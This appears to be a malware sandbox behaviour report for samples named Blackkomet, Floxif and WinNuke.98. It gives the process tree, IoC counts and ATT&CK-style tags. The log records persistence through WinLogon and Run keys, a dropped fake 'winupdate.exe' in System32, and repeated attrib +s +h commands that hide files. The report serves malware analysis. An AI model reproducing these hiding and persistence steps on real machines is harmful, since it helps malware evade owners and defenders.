3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3808	OpenWith.exe
3128	firefox.exe
3128	firefox.exe
3128	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4512 wrote to memory of 4080	4512	msedge.exe	78
PID 4512 wrote to memory of 4080	4512	msedge.exe	78
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 664	4512	msedge.exe	79
PID 4512 wrote to memory of 3836	4512	msedge.exe	80
PID 4512 wrote to memory of 3836	4512	msedge.exe	80
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81
PID 4512 wrote to memory of 4768	4512	msedge.exe	81

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 16 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4084	attrib.exe
1156	attrib.exe
932	attrib.exe
1912	attrib.exe
5220	attrib.exe
5600	attrib.exe
6060	attrib.exe
3128	attrib.exe
5896	attrib.exe
4548	attrib.exe
5340	attrib.exe
5380	attrib.exe
3632	attrib.exe
1612	attrib.exe
4940	attrib.exe
3796	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\search.htm
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa0a1a3cb8,0x7ffa0a1a3cc8,0x7ffa0a1a3cd8
  2⤵
  PID:4080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2584 /prefetch:8
  2⤵
  PID:4768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:5100
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
  2⤵
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:1388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
  2⤵
  PID:3152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1
  2⤵
  PID:4804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1
  2⤵
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
  2⤵
  PID:1396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3336 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:1
  2⤵
  PID:5452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5764 /prefetch:8
  2⤵
  PID:1600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1644 /prefetch:1
  2⤵
  PID:888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
  2⤵
  PID:4936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5996
- C:\Users\Admin\Downloads\WinNuke.98.exe
  "C:\Users\Admin\Downloads\WinNuke.98.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5376
- C:\Users\Admin\Downloads\WinNuke.98.exe
  "C:\Users\Admin\Downloads\WinNuke.98.exe"
  2⤵
  - Executes dropped EXE
  PID:4296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:5848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4892 /prefetch:8
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4896
- C:\Users\Admin\Downloads\Floxif.exe
  "C:\Users\Admin\Downloads\Floxif.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4276
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 456
    3⤵
    - Program crash
    PID:2036
- C:\Users\Admin\Downloads\Floxif.exe
  "C:\Users\Admin\Downloads\Floxif.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3348
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 424
    3⤵
    - Program crash
    PID:2832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7064 /prefetch:8
  2⤵
  PID:5136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,5723423785677023745,16196328779279788749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5856 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5744
- C:\Users\Admin\Downloads\Blackkomet.exe
  "C:\Users\Admin\Downloads\Blackkomet.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  PID:704
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads\Blackkomet.exe" +s +h
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:3632
- - C:\Windows\SysWOW64\attrib.exe
    attrib "C:\Users\Admin\Downloads" +s +h
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:5600
- - C:\Windows\SysWOW64\Windupdt\winupdate.exe
    "C:\Windows\system32\Windupdt\winupdate.exe"
    3⤵
    - Modifies WinLogon for persistence
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:4536
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
      4⤵
      Sets file to hidden
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:6060
  - - C:\Windows\SysWOW64\attrib.exe
      attrib "C:\Windows\SysWOW64\Windupdt" +s +h
      4⤵
      Sets file to hidden
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3128
  - - C:\Windows\SysWOW64\Windupdt\winupdate.exe
      "C:\Windows\system32\Windupdt\winupdate.exe"
      4⤵
      Modifies WinLogon for persistence
      Executes dropped EXE
      Adds Run key to start application
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4636
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        5⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4084
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        5⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1612
    - - C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3148
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        6⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1156
      - C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        6⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4940
      - C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        6⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4532
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        7⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5340
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        7⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:932
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        7⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1844
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        8⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5896
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        8⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5380
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        8⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:5532
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        9⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:5220
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        9⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:1912
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        9⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        
        PID:4300
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        10⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3796
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        10⤵
        Sets file to hidden
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
